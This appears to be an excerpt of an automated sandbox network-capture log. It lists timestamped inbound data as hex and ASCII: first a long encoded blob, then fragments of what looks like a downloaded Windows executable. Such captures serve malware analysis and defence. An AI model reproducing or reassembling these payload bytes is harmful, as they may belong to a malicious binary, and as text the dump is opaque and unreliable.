2022-11-13 18:26:59 UTC	274	IN	Data Raw: 34 58 44 62 77 73 78 51 5a 46 61 77 30 66 39 55 5a 56 56 68 45 6e 68 66 72 2b 59 4e 55 58 68 4c 4a 6e 59 6c 61 50 6a 6d 50 69 4a 66 62 66 36 75 74 49 66 73 31 33 68 32 55 6b 2b 4c 4c 67 6a 6c 73 4e 45 50 56 47 56 56 32 31 62 51 45 2b 50 6d 44 56 46 34 53 33 7a 5a 71 4f 42 36 59 30 5a 6c 31 4f 6a 34 4d 6b 74 34 35 75 39 77 64 6c 4a 50 7a 52 64 41 64 74 6c 55 55 46 5a 6c 6b 72 55 61 51 31 39 6f 6e 6a 52 53 65 43 43 39 49 69 5a 6f 65 51 2f 50 70 43 39 75 65 44 48 4b 7a 52 31 68 41 48 58 79 4a 58 78 45 35 64 4e 42 5a 33 64 58 31 77 6a 50 6c 63 48 71 47 47 42 31 55 6c 4d 6d 45 6b 58 69 37 66 6c 67 52 69 45 70 51 33 67 78 49 50 33 74 59 51 42 31 4b 63 62 42 30 32 64 57 4d 53 7a 36 30 6a 56 55 4d 47 72 42 36 75 68 67 64 56 4a 7a 38 43 42 53 34 75 30 42 59 45 59 Data Ascii: 4XDbwsxQZFaw0f9UZVVhEnhfr+YNUXhLJnYlaPjmPiJfbf6utIfs13h2Uk+LLgjlsNEPVGVV21bQE+PmDVF4S3zZqOB6Y0Zl1Oj4Mkt45u9wdlJPzRdAdtlUUFZlkrUaQ19onjRSeCC9IiZoeQ/PpC9ueDHKzR1hAHXyJXxE5dNBZ3dX1wjPlcHqGGB1UlMmEkXi7flgRiEpQ3gxIP3tYQB1KcbB02dWMSz60jVUMGrB6uhgdVJz8CBS4u0BYEY
2022-11-13 18:26:59 UTC	282	IN	Data Raw: 41 48 64 45 64 46 39 6b 64 35 59 42 63 52 42 6c 77 53 74 4d 51 77 46 6e 2b 67 53 35 46 67 46 49 37 68 71 35 33 74 51 70 58 42 48 47 64 43 32 6a 34 58 48 62 41 32 42 7a 35 53 49 56 52 45 51 6c 34 4d 36 37 4c 6d 52 2f 34 53 64 52 63 76 4d 48 48 48 71 75 4c 46 31 54 64 65 6e 6e 33 72 63 51 66 6a 6e 6b 61 73 63 78 64 6d 2f 6e 46 47 52 57 73 42 42 54 64 37 6f 59 74 42 62 4c 45 30 78 44 67 72 4e 54 67 65 6d 37 4a 71 4b 34 69 6b 4f 6f 45 30 6c 59 73 41 64 63 54 55 43 41 54 34 65 4f 49 48 64 45 58 4c 41 51 55 33 64 47 58 59 69 46 79 78 74 4d 51 2f 77 57 58 47 75 7a 48 67 46 51 38 6d 64 69 45 70 63 73 38 58 6c 50 76 79 6c 47 49 43 52 4f 54 30 51 34 49 48 49 52 62 2f 34 54 51 58 57 78 4c 6d 52 2f 49 77 70 31 55 76 6b 2f 48 48 4c 41 61 48 31 6a 7a 57 56 37 54 66 46 Data Ascii: AHdEdF9kd5YBcRBlwStMQwFn+gS5FgFI7hq53tQpXBHGdC2j4XHbA2Bz5SIVREQl4M67LmR/4SdRcvMHHHquLF1Tdenn3rcQfjnkascxdm/nFGRWsBBTd7oYtBbLE0xDgrNTgem7JqK4ikOoE0lYsAdcTUCAT4eOIHdEXLAQU3dGXYiFyxtMQ/wWXGuzHgFQ8mdiEpcs8XlPvylGICROT0Q4IHIRb/4TQXWxLmR/Iwp1Uvk/HHLAaH1jzWV7TfF
2022-11-13 18:26:59 UTC	290	IN	Data Raw: 51 4a 34 45 52 30 56 51 2b 54 38 63 59 74 44 44 66 6d 50 4e 5a 58 74 64 38 58 56 76 53 4f 59 75 4a 44 33 5a 53 32 42 67 72 4e 39 37 59 4c 41 54 51 57 57 4f 6c 45 42 66 36 53 64 52 59 75 6e 64 4f 46 4b 6b 4c 46 31 54 42 63 78 66 62 66 6c 46 62 30 68 57 46 6c 72 63 30 7a 74 67 59 38 38 71 62 73 33 38 45 30 46 6c 75 53 35 6b 62 79 44 67 73 58 71 37 68 2f 51 53 64 69 44 36 6a 32 59 53 6e 79 58 7a 36 41 50 7a 4a 48 4b 4e 4a 56 4d 4b 64 35 4f 6a 45 68 56 63 4a 41 68 6c 56 62 6b 75 5a 47 4f 58 4d 44 58 58 75 44 38 6f 48 71 34 72 59 53 76 4e 61 6b 2f 58 48 44 46 4c 65 4a 49 78 51 44 33 5a 42 46 79 37 42 2b 66 50 6d 37 41 54 51 57 58 59 61 55 42 66 36 53 64 52 59 69 55 36 4f 46 4c 6b 44 46 31 54 51 4b 41 72 53 55 68 78 47 6d 56 74 36 55 52 52 59 67 66 48 6c 30 51 Data Ascii: QJ4ER0VQ+T8cYtDDfmPNZXtd8XVvSOYuJD3ZS2BgrN97YLATQWWOlEBf6SdRYundOFKkLF1TBcxfbflFb0hWFlrc0ztgY88qbs38E0FluS5kbyDgsXq7h/QSdiD6j2YSnyXz6APzJHKNJVMKd5OjEhVcJAhlVbkuZGOXMDXXuD8oHq4rYSvNak/XHDFLeJIxQD3ZBFy7B+fPm7ATQWXYaUBf6SdRYiU6OFLkDF1TQKArSUhxGmVt6URRYgfHl0Q
2022-11-13 18:26:59 UTC	298	IN	Data Raw: 46 2b 51 39 71 51 50 31 61 4a 77 46 69 71 30 48 7a 52 5a 30 6b 62 51 45 64 6c 64 6c 38 59 4e 71 51 4a 37 46 41 33 52 53 65 45 62 35 2f 30 56 70 65 57 4e 4b 6f 75 6f 4e 65 54 46 4c 48 4f 62 6e 59 48 52 53 54 38 33 57 42 46 63 78 5a 4c 44 53 42 56 51 77 61 6a 57 31 61 47 4d 65 31 78 68 4b 4f 46 4a 73 34 66 77 44 52 79 46 66 42 76 31 52 53 6e 68 74 46 49 6e 77 4d 6b 35 45 55 2b 2f 62 55 57 56 33 56 39 32 63 63 6e 7a 79 71 49 6d 69 6e 31 62 78 33 6c 68 54 4a 57 6a 34 31 69 59 67 58 32 31 64 4d 42 78 35 35 75 64 67 64 46 4a 50 7a 64 59 45 56 7a 46 6b 50 39 70 67 75 5a 74 71 51 42 66 68 4a 6a 30 61 39 55 37 42 76 69 56 6f 4d 65 6f 44 32 52 66 67 66 59 38 70 68 70 49 71 69 66 43 4b 54 30 52 54 6f 39 4e 52 5a 58 64 58 45 2f 41 77 61 73 48 53 43 47 4a 31 55 6f 71 Data Ascii: F+Q9qQP1aJwFiq0HzRZ0kbQEdldl8YNqQJ7FA3RSeEb5/0VpeWNKouoNeTFLHObnYHRST83WBFcxZLDSBVQwajW1aGMe1xhKOFJs4fwDRyFfBv1RSnhtFInwMk5EU+/bUWV3V92ccnzyqImin1bx3lhTJWj41iYgX21dMBx55udgdFJPzdYEVzFkP9pguZtqQBfhJj0a9U7BviVoMeoD2RfgfY8phpIqifCKT0RTo9NRZXdXE/AwasHSCGJ1Uoq
2022-11-13 18:26:59 UTC	306	IN	Data Raw: 7a 78 39 41 4e 73 61 46 58 4a 32 30 76 44 4f 67 67 62 5a 71 36 6a 6c 32 47 49 70 63 64 6b 56 6c 2b 42 64 69 51 52 6a 36 66 44 57 4d 50 45 6b 61 49 6c 42 53 54 38 55 66 51 43 37 4f 32 38 69 34 70 44 45 55 45 6b 72 65 48 45 63 4e 6a 50 53 39 78 68 61 75 4a 46 30 62 41 71 6f 62 53 52 69 36 48 31 77 46 4b 6f 73 32 4d 73 51 49 64 31 51 65 75 43 42 54 64 34 30 56 45 4a 57 2f 61 68 2f 72 4a 6b 4a 44 6a 55 78 45 62 65 4e 69 4b 33 33 2b 55 4f 68 4b 7a 72 53 48 58 71 4a 49 39 70 59 50 47 77 30 2f 6c 58 6e 76 4e 47 65 4f 70 2f 79 6d 6a 42 66 72 6a 31 32 56 50 47 38 77 57 47 35 6f 65 61 51 43 42 56 50 36 69 44 46 4c 76 79 6c 47 45 49 61 39 54 30 53 55 49 48 49 42 61 66 6c 58 5a 52 32 37 75 79 73 62 54 46 4e 65 32 7a 78 76 43 4e 4e 52 54 45 6b 66 72 44 70 66 35 6a 77 Data Ascii: zx9ANsaFXJ20vDOggbZq6jl2GIpcdkVl+BdiQRj6fDWMPEkaIlBST8UfQC7O28i4pDEUEkreHEcNjPS9xhauJF0bAqobSRi6H1wFKos2MsQId1QeuCBTd40VEJW/ah/rJkJDjUxEbeNiK33+UOhKzrSHXqJI9pYPGw0/lXnvNGeOp/ymjBfrj12VPG8wWG5oeaQCBVP6iDFLvylGEIa9T0SUIHIBaflXZR27uysbTFNe2zxvCNNRTEkfrDpf5jw
2022-11-13 18:26:59 UTC	313	IN	Data Raw: 75 42 79 6e 48 2b 77 6c 2b 4f 4d 6f 6e 79 7a 71 42 65 72 7a 7a 78 7a 36 4a 57 68 35 36 67 49 46 64 2b 62 38 46 65 74 34 62 57 4a 42 2f 6f 76 47 41 48 64 45 76 6f 79 67 69 4b 68 57 6c 62 6b 75 5a 44 73 67 36 48 44 79 6e 45 73 34 6c 57 46 4d 47 57 48 4b 49 56 38 6c 2f 66 46 45 2f 64 46 69 41 48 57 56 43 32 41 4c 69 70 6b 78 5a 4d 39 49 34 4c 35 68 4b 2f 6c 6c 31 52 30 79 30 7a 78 76 59 47 41 64 6c 34 61 6b 41 67 56 2f 34 4a 76 59 35 66 4d 68 52 6c 69 43 73 2f 66 48 37 63 52 35 38 49 35 30 33 6a 46 78 61 4f 73 45 65 7a 42 49 67 46 4a 34 79 6b 78 32 66 52 71 79 5a 30 62 6d 47 30 6b 73 47 50 46 34 62 65 4e 45 55 51 5a 34 79 31 4e 6b 31 33 56 41 49 2f 41 6e 56 54 44 68 44 48 73 38 6c 4a 54 71 74 59 66 30 6e 75 53 43 66 65 6f 53 42 51 76 73 44 42 55 66 62 6a 4a Data Ascii: uBynH+wl+OMonyzqBerzzxz6JWh56gIFd+b8Fet4bWJB/ovGAHdEvoygiKhWlbkuZDsg6HDynEs4lWFMGWHKIV8l/fFE/dFiAHWVC2ALipkxZM9I4L5hK/ll1R0y0zxvYGAdl4akAgV/4JvY5fMhRliCs/fH7cR58I503jFxaOsEezBIgFJ4ykx2fRqyZ0bmG0ksGPF4beNEUQZ4y1Nk13VAI/AnVTDhDHs8lJTqtYf0nuSCfeoSBQvsDBUfbjJ
2022-11-13 18:26:59 UTC	321	IN	Data Raw: 58 32 33 78 63 45 63 77 37 71 5a 6f 4e 41 30 4f 47 51 77 36 44 57 79 6e 75 35 75 70 33 47 52 4f 55 4e 59 6b 52 33 30 48 4d 4d 44 55 47 71 61 45 43 61 51 44 30 61 35 4e 65 44 47 4d 50 5a 6e 36 71 58 56 53 66 49 51 62 37 52 50 4a 6f 7a 4a 50 53 42 6b 77 61 73 45 71 63 49 72 67 63 5a 54 4b 54 55 70 71 43 63 69 66 7a 57 52 48 35 44 33 56 6a 44 31 31 30 55 42 31 55 73 34 4a 53 37 73 4c 57 4a 73 63 45 6e 30 37 75 53 39 59 33 68 31 37 66 4a 47 77 33 4c 4d 58 50 65 45 38 69 34 46 6b 52 77 43 55 4d 55 76 35 4b 48 70 61 70 56 4a 50 78 53 5a 38 47 53 6a 70 49 64 77 67 54 62 6b 76 6f 4a 67 74 51 32 57 32 65 45 75 35 46 77 58 38 6d 47 4e 47 53 68 70 4e 51 72 67 4f 57 4f 77 58 49 4c 72 39 73 37 53 53 41 58 59 32 35 51 4a 33 35 69 59 45 4a 34 63 61 73 43 70 30 55 6e 6a Data Ascii: X23xcEcw7qZoNA0OGQw6DWynu5up3GROUNYkR30HMMDUGqaECaQD0a5NeDGMPZn6qXVSfIQb7RPJozJPSBkwasEqcIrgcZTKTUpqCcifzWRH5D3VjD110UB1Us4JS7sLWJscEn07uS9Y3h17fJGw3LMXPeE8i4FkRwCUMUv5KHpapVJPxSZ8GSjpIdwgTbkvoJgtQ2W2eEu5FwX8mGNGShpNQrgOWOwXILr9s7SSAXY25QJ35iYEJ4casCp0Unj
2022-11-13 18:26:59 UTC	329	IN	Data Raw: 65 6f 51 6c 36 51 55 52 34 55 39 45 46 2b 38 62 41 53 44 38 45 6c 33 65 5a 62 72 4c 45 6b 67 72 2f 42 5a 63 61 39 41 65 36 35 65 47 4b 38 55 45 47 39 35 34 4d 55 75 2f 4b 45 4b 30 2b 46 4a 50 78 52 5a 45 78 4f 64 6b 64 2b 2b 32 47 46 4a 36 79 78 4a 49 6c 4a 53 54 6b 6b 69 78 42 77 58 70 44 45 4f 66 49 31 39 74 38 33 52 72 38 57 68 38 73 33 56 53 69 45 47 66 31 31 59 78 5a 37 39 58 5a 62 79 50 59 55 42 66 72 79 5a 56 47 74 42 4c 4f 4a 4e 49 53 48 50 69 41 77 45 51 70 58 67 78 79 67 31 4e 56 65 78 37 55 73 51 42 63 34 7a 73 30 5a 75 49 6b 47 44 4a 67 32 70 41 73 4a 64 6a 64 62 76 33 51 44 68 53 34 69 31 5a 2b 4c 6b 68 58 2b 61 2b 75 67 5a 59 6d 6f 50 42 6e 31 62 47 45 58 50 6c 49 78 45 51 39 46 78 6c 33 6e 56 4b 71 50 65 35 6e 49 71 56 50 57 76 54 2f 43 56 Data Ascii: eoQl6QUR4U9EF+8bASD8El3eZbrLEkgr/BZca9Ae65eGK8UEG954MUu/KEK0+FJPxRZExOdkd++2GFJ6yxJIlJSTkkixBwXpDEOfI19t83Rr8Wh8s3VSiEGf11YxZ79XZbyPYUBfryZVGtBLOJNISHPiAwEQpXgxyg1NVex7UsQBc4zs0ZuIkGDJg2pAsJdjdbv3QDhS4i1Z+LkhX+a+ugZYmoPBn1bGEXPlIxEQ9Fxl3nVKqPe5nIqVPWvT/CV
2022-11-13 18:26:59 UTC	337	IN	Data Raw: 49 51 4b 32 76 32 30 59 76 53 70 49 4f 53 6e 71 4e 61 68 33 2f 66 6b 30 35 49 46 78 42 51 65 6f 48 35 45 65 63 4d 49 77 6b 79 38 37 72 43 43 4b 49 68 62 74 59 6b 73 6f 2b 67 74 42 4e 58 6e 68 67 68 62 6a 4f 46 55 62 38 79 41 49 47 36 36 4c 4f 44 30 5a 66 35 77 6c 38 57 31 76 63 44 67 30 56 7a 33 66 34 32 41 7a 6e 4b 6e 4f 4c 50 61 37 78 56 30 77 61 6f 66 61 6f 47 52 31 55 70 71 4e 4f 46 4a 74 34 34 6a 62 53 75 64 66 62 54 43 36 39 72 42 71 59 67 42 47 69 58 4a 78 51 32 52 57 50 75 44 47 55 57 56 56 44 57 4a 68 58 32 68 73 38 56 42 2b 53 7a 68 76 56 43 35 35 59 30 6d 6c 62 6d 68 34 4d 58 62 49 4e 6d 49 41 65 74 5a 6f 54 46 4e 6b 61 34 73 57 64 31 64 71 30 55 52 75 51 46 39 56 66 39 4e 53 65 45 53 38 42 53 64 6f 65 56 34 39 6b 46 39 74 44 47 56 32 64 4b 74 Data Ascii: IQK2v20YvSpIOSnqNah3/fk05IFxBQeoH5EecMIwky87rCCKIhbtYkso+gtBNXnhghbjOFUb8yAIG66LOD0Zf5wl8W1vcDg0Vz3f42AznKnOLPa7xV0waofaoGR1UpqNOFJt44jbSudfbTC69rBqYgBGiXJxQ2RWPuDGUWVVDWJhX2hs8VB+SzhvVC55Y0mlbmh4MXbINmIAetZoTFNka4sWd1dq0URuQF9Vf9NSeES8BSdoeV49kF9tDGV2dKt
2022-11-13 18:26:59 UTC	344	IN	Data Raw: 4f 4e 4e 51 44 77 35 32 57 45 71 65 43 42 38 68 49 44 30 4b 54 49 6b 77 4e 63 34 78 4e 49 76 63 4d 6d 7a 38 45 67 4c 63 64 53 47 48 47 67 38 79 45 6c 4a 34 77 48 55 31 6e 51 57 34 64 53 72 57 76 6b 61 79 34 4b 4a 37 70 36 50 70 63 4e 73 43 49 39 49 52 4d 66 45 55 58 6b 54 75 45 46 66 6a 42 55 43 76 4a 68 49 71 74 6b 73 34 30 32 67 50 5a 39 32 37 4f 64 34 59 48 2f 53 33 6c 70 37 70 54 52 4c 71 30 46 61 33 54 61 48 51 54 37 32 47 6a 46 62 36 71 36 6c 5a 34 53 34 53 30 77 30 73 55 58 34 35 49 50 49 6d 49 61 67 61 56 72 39 30 4c 49 49 36 59 67 43 30 50 79 68 4b 30 68 45 78 5a 50 6c 36 59 77 34 51 56 30 66 4a 47 67 2f 6f 4f 44 58 41 69 76 69 53 35 5a 2b 59 6f 71 77 6e 31 6a 67 66 73 44 34 66 64 66 42 42 4a 4e 6b 4b 49 39 6f 68 65 66 59 68 45 42 72 36 56 54 44 Data Ascii: ONNQDw52WEqeCB8hID0KTIkwNc4xNIvcMmz8EgLcdSGHGg8yElJ4wHU1nQW4dSrWvkay4KJ7p6PpcNsCI9IRMfEUXkTuEFfjBUCvJhIqtks402gPZ927Od4YH/S3lp7pTRLq0Fa3TaHQT72GjFb6q6lZ4S4S0w0sUX45IPImIagaVr90LII6YgC0PyhK0hExZPl6Yw4QV0fJGg/oODXAiviS5Z+Yoqwn1jgfsD4fdfBBJNkKI9ohefYhEBr6VTD
2022-11-13 18:26:59 UTC	352	IN	Data Raw: 44 31 78 5a 34 33 52 52 5a 70 4a 31 62 43 33 64 64 55 42 44 45 2b 37 59 6b 47 74 41 58 79 7a 6f 4d 58 5a 49 77 47 78 32 48 65 45 39 52 32 62 4a 43 69 79 47 7a 67 66 31 38 55 61 51 64 31 4a 50 44 64 67 2f 54 6e 6a 76 42 48 63 73 33 6b 74 43 43 64 53 4c 50 72 61 56 2f 65 73 35 55 69 57 6b 75 32 4e 47 6f 4e 72 4e 65 54 46 4c 61 69 79 64 2f 2f 37 66 37 30 56 54 5a 4f 36 51 78 4e 66 33 6b 72 52 34 35 77 52 37 4f 43 76 2b 6d 62 6d 68 50 68 71 73 4c 46 31 44 7a 37 54 2f 62 48 67 78 79 76 33 4e 59 77 42 31 5a 44 78 45 55 2b 58 6a 6b 57 56 33 56 79 37 2f 76 4d 37 42 36 73 68 69 64 56 4a 46 37 37 6e 32 34 69 78 64 56 77 2b 46 58 32 33 35 66 57 39 4d 52 64 31 4d 6a 74 4d 37 59 47 64 6d 6c 58 36 66 73 42 4e 42 5a 63 35 66 51 46 2f 70 4a 31 46 69 30 6a 55 34 55 71 51 Data Ascii: D1xZ43RRZpJ1bC3ddUBDE+7YkGtAXyzoMXZIwGx2HeE9R2bJCiyGzgf18UaQd1JPDdg/TnjvBHcs3ktCCdSLPraV/es5UiWku2NGoNrNeTFLaiyd//7f70VTZO6QxNf3krR45wR7OCv+mbmhPhqsLF1Dz7T/bHgxyv3NYwB1ZDxEU+XjkWV3Vy7/vM7B6shidVJF77n24ixdVw+FX235fW9MRd1MjtM7YGdmlX6fsBNBZc5fQF/pJ1Fi0jU4UqQ
2022-11-13 18:26:59 UTC	360	IN	Data Raw: 6e 48 56 53 6a 69 68 33 47 46 4b 77 45 46 4d 72 46 62 34 2f 61 6f 63 62 54 42 4d 78 68 33 68 4c 75 52 59 42 47 4a 48 6a 52 69 47 65 43 56 78 42 51 50 6b 5a 52 6e 42 62 49 66 52 4f 6c 43 45 2b 30 45 74 33 56 37 51 34 57 4f 73 4e 4e 79 6b 47 30 51 58 35 50 6c 44 64 64 38 55 75 70 41 49 46 4b 7a 5a 59 4d 55 76 35 49 55 5a 30 41 70 4f 44 4e 39 49 51 63 6b 56 6a 43 4a 63 57 48 62 73 76 30 42 66 68 4a 31 45 4b 38 77 35 59 32 32 46 4d 4b 53 76 4c 5a 4d 63 6c 38 58 56 76 4d 4f 59 6d 4a 41 48 62 43 32 41 54 37 78 4e 5a 37 54 4e 7a 58 64 35 30 54 6a 44 57 4c 45 64 46 32 54 78 76 52 42 61 75 4a 46 30 62 43 36 70 62 53 54 6d 36 42 31 78 6c 4b 6f 6b 70 64 6d 66 4e 46 30 42 32 32 57 44 2b 71 70 71 53 64 51 71 42 58 6d 68 6a 74 44 63 59 54 62 4f 43 5a 4f 4f 4d 34 67 4e Data Ascii: nHVSjih3GFKwEFMrFb4/aocbTBMxh3hLuRYBGJHjRiGeCVxBQPkZRnBbIfROlCE+0Et3V7Q4WOsNNykG0QX5PlDdd8UupAIFKzZYMUv5IUZ0ApODN9IQckVjCJcWHbsv0BfhJ1EK8w5Y22FMKSvLZMcl8XVvMOYmJAHbC2AT7xNZ7TNzXd50TjDWLEdF2TxvRBauJF0bC6pbSTm6B1xlKokpdmfNF0B22WD+qpqSdQqBXmhjtDcYTbOCZOOM4gN
2022-11-13 18:26:59 UTC	368	IN	Data Raw: 6a 47 67 6c 61 50 67 6d 5a 69 71 74 62 58 68 61 44 6c 67 56 36 30 56 56 4f 51 70 6b 58 4f 30 54 45 64 7a 77 4e 6e 33 54 73 52 39 67 72 66 59 68 66 5a 55 39 55 78 64 4b 4a 57 6a 79 4c 6c 37 57 76 6b 61 79 34 4b 4a 37 70 36 50 70 63 4e 73 43 58 4e 49 70 54 6f 4c 57 38 69 4d 4f 45 43 67 51 79 52 70 77 43 44 42 4b 4c 73 4a 39 53 70 32 6e 73 6b 46 34 6f 43 70 31 4a 65 58 41 37 36 6f 6e 30 42 66 36 54 30 54 53 49 59 59 32 66 49 69 6f 35 42 44 67 70 79 35 66 61 4f 67 34 67 6f 2b 71 45 35 6a 30 67 58 71 70 68 38 68 5a 35 44 58 68 79 67 32 39 76 62 64 2b 55 6f 67 42 69 78 48 6f 4d 57 53 32 4f 72 31 5a 73 52 2b 59 44 50 70 75 64 5a 55 39 57 38 55 58 4a 57 6a 34 4a 6c 5a 56 62 57 31 34 73 41 35 6f 58 43 49 41 64 54 6b 4b 56 42 62 74 45 79 48 6c 4f 6b 63 75 32 6b 4d Data Ascii: jGglaPgmZiqtbXhaDlgV60VVOQpkXO0TEdzwNn3TsR9grfYhfZU9UxdKJWjyLl7Wvkay4KJ7p6PpcNsCXNIpToLW8iMOECgQyRpwCDBKLsJ9Sp2nskF4oCp1JeXA76on0Bf6T0TSIYY2fIio5BDgpy5faOg4go+qE5j0gXqph8hZ5DXhyg29vbd+UogBixHoMWS2Or1ZsR+YDPpudZU9W8UXJWj4JlZVbW14sA5oXCIAdTkKVBbtEyHlOkcu2kM
2022-11-13 18:26:59 UTC	376	IN	Data Raw: 2b 42 62 32 48 76 71 6a 65 50 59 4f 77 4d 65 6f 41 48 57 54 4b 76 78 5a 35 52 4f 4a 42 6b 74 58 5a 64 52 46 30 6a 4e 35 52 6d 43 79 46 32 44 63 71 46 49 6c 36 54 78 37 6e 68 43 67 6b 76 4e 38 55 34 2b 4d 32 71 50 2b 66 50 56 76 6d 62 57 2f 4d 71 36 32 76 6d 50 63 66 58 4c 42 45 6e 43 54 54 6b 39 6f 77 48 56 4b 30 6f 6d 34 69 55 43 6f 43 6e 58 35 52 46 4f 71 34 31 55 41 2f 68 52 76 7a 52 64 41 66 72 6f 68 62 78 50 75 47 49 6a 68 46 65 2f 6a 4c 73 48 62 50 47 38 59 75 70 6f 4a 68 35 7a 2b 66 6c 31 74 65 4e 68 79 68 70 4b 64 53 50 78 70 69 41 46 4c 45 34 6b 78 5a 4d 2b 4d 4c 6a 30 66 34 51 31 48 6e 34 4c 4e 2f 51 61 62 61 58 6e 76 75 5a 42 67 6a 4f 43 32 61 50 46 38 55 37 6b 41 65 67 50 2b 48 31 65 7a 73 6b 2b 63 34 49 31 30 6e 61 53 38 4e 75 4d 4e 52 2b 6b Data Ascii: +Bb2HvqjePYOwMeoAHWTKvxZ5ROJBktXZdRF0jN5RmCyF2DcqFIl6Tx7nhCgkvN8U4+M2qP+fPVvmbW/Mq62vmPcfXLBEnCTTk9owHVK0om4iUCoCnX5RFOq41UA/hRvzRdAfrohbxPuGIjhFe/jLsHbPG8YupoJh5z+fl1teNhyhpKdSPxpiAFLE4kxZM+MLj0f4Q1Hn4LN/QabaXnvuZBgjOC2aPF8U7kAegP+H1ezsk+c4I10naS8NuMNR+k
2022-11-13 18:26:59 UTC	384	IN	Data Raw: 41 44 32 44 54 55 54 76 43 56 59 78 79 52 6c 58 5a 62 6e 67 61 45 44 76 42 6d 4e 31 51 41 68 4c 4f 4d 37 30 61 6e 6c 33 4e 69 46 66 51 41 6b 78 53 34 53 39 59 41 42 46 49 30 39 45 38 52 5a 57 4d 64 53 6d 56 57 58 78 51 6d 70 41 66 68 78 6a 64 51 61 6f 53 54 68 32 55 57 68 35 66 6a 4d 68 58 32 47 6f 4d 30 74 59 47 47 49 41 49 79 52 50 52 4d 75 30 56 44 45 38 41 56 64 6c 44 6b 6c 71 51 4f 65 35 59 58 55 4f 41 55 73 34 5a 56 35 6f 65 57 65 58 49 31 39 56 41 7a 46 4c 78 42 5a 69 41 4f 32 43 54 55 54 76 48 31 59 78 69 77 78 58 5a 61 6e 67 61 45 43 76 45 32 4e 31 53 77 56 4c 4f 4a 62 30 61 6e 6c 2f 4f 79 46 66 52 41 59 78 53 36 79 38 59 41 42 5a 4c 45 39 45 54 42 74 57 4d 66 53 6e 56 57 56 31 54 32 70 41 50 65 74 6a 64 59 36 70 53 54 67 32 70 6d 68 35 44 73 49 Data Ascii: AD2DTUTvCVYxyRlXZbngaEDvBmN1QAhLOM70anl3NiFfQAkxS4S9YABFI09E8RZWMdSmVWXxQmpAfhxjdQaoSTh2UWh5fjMhX2GoM0tYGGIAIyRPRMu0VDE8AVdlDklqQOe5YXUOAUs4ZV5oeWeXI19VAzFLxBZiAO2CTUTvH1YxiwxXZangaECvE2N1SwVLOJb0anl/OyFfRAYxS6y8YABZLE9ETBtWMfSnVWV1T2pAPetjdY6pSTg2pmh5DsI
2022-11-13 18:26:59 UTC	391	IN	Data Raw: 00 00 00 00 48 8a 06 00 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 38 34 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 07 02 00 07 01 1f 00 01 07 02 00 07 01 1f 00 01 00 00 00 01 0a 04 00 0a 34 06 00 0a 32 06 70 01 04 01 00 04 42 00 00 01 04 01 00 04 42 00 00 01 04 01 00 04 42 00 00 01 00 00 00 01 14 06 00 14 64 07 00 14 34 06 00 14 32 10 70 01 06 02 00 06 32 02 30 01 06 02 00 06 32 02 30 01 0a 04 00 0a 34 06 00 0a 32 06 70 01 0a 02 00 0a 32 06 30 01 0a 02 00 0a 32 06 30 01 06 02 00 06 32 02 30 01 0a 04 00 0a 34 06 00 0a 32 06 70 01 06 02 00 06 32 02 30 01 0a 04 00 0a 34 06 00 0a 32 06 70 01 06 02 00 06 32 02 30 01 0a 04 Data Ascii: H@8442pBBBd42p202042p20202042p2042p20
2022-11-13 18:26:59 UTC	393	IN	Data Raw: 15 74 08 00 15 64 07 00 15 34 06 00 15 32 11 c0 01 14 08 00 14 64 08 00 14 54 07 00 14 34 06 00 14 32 10 70 01 04 01 00 04 42 00 00 01 06 02 00 06 32 02 50 11 15 08 00 15 74 08 00 15 64 07 00 15 34 06 00 15 32 11 d0 3c 7b 00 00 01 00 00 00 73 96 00 00 b1 96 00 00 4b 0a 02 00 00 00 00 00 01 0a 04 00 0a 34 06 00 0a 32 06 70 01 06 02 00 06 32 02 30 01 04 01 00 04 42 00 00 01 0f 06 00 0f 64 07 00 0f 34 06 00 0f 32 0b 70 01 04 01 00 04 42 00 00 01 04 01 00 04 42 00 00 01 04 01 00 04 42 00 00 01 0f 06 00 0f 64 07 00 0f 34 06 00 0f 32 0b 70 01 06 02 00 06 32 02 30 01 0a 04 00 0a 34 06 00 0a 32 06 70 01 08 02 00 08 92 04 30 01 08 02 00 08 92 04 30 01 0a 04 00 0a 34 06 00 0a 32 06 70 01 06 02 00 06 32 02 30 01 0f 06 00 0f 64 07 00 0f 34 06 00 0f 32 0b 70 01 0a 04 Data Ascii: td42dT42pB2Ptd42<{sK42p20Bd42pBBBd42p2042p0042p20d42p
2022-11-13 18:26:59 UTC	401	IN	Data Raw: 00 00 00 00 20 5c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 ed 01 00 00 00 00 00 78 5c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 90 5c 06 00 d0 5b 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 8a 06 00 00 00 00 00 ff ff ff ff 00 00 00 00 18 00 00 00 00 06 02 00 00 00 00 00 00 00 00 00 78 5f 06 00 00 00 00 00 00 00 00 00 c6 61 06 00 60 22 02 00 18 5d 06 00 00 00 00 00 00 00 00 00 20 62 06 00 00 20 02 00 28 60 06 00 00 00 00 00 00 00 00 00 70 62 06 00 10 23 02 00 50 5d 06 00 00 00 00 00 00 00 00 00 62 67 06 00 38 20 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 62 06 00 00 00 00 00 fa 61 06 00 00 00 00 00 ea 61 06 00 00 00 00 00 de 61 06 00 00 00 00 00 d2 61 06 00 00 00 00 Data Ascii: \x\\[Hx_a`"] b (`pb#P]bg8 baaaa
2022-11-13 18:26:59 UTC	409	IN	Data Raw: 1b 00 00 00 00 00 00 00 34 48 02 80 01 00 00 00 1f 00 00 00 00 00 00 00 2c 48 02 80 01 00 00 00 13 00 00 00 00 00 00 00 24 48 02 80 01 00 00 00 21 00 00 00 00 00 00 00 1c 48 02 80 01 00 00 00 0e 00 00 00 00 00 00 00 14 48 02 80 01 00 00 00 0d 00 00 00 00 00 00 00 0c 48 02 80 01 00 00 00 0f 00 00 00 00 00 00 00 04 48 02 80 01 00 00 00 10 00 00 00 00 00 00 00 fc 47 02 80 01 00 00 00 05 00 00 00 00 00 00 00 f4 47 02 80 01 00 00 00 1e 00 00 00 00 00 00 00 a0 27 02 80 01 00 00 00 12 00 00 00 00 00 00 00 ac 27 02 80 01 00 00 00 20 00 00 00 00 00 00 00 f0 47 02 80 01 00 00 00 0c 00 00 00 00 00 00 00 e8 47 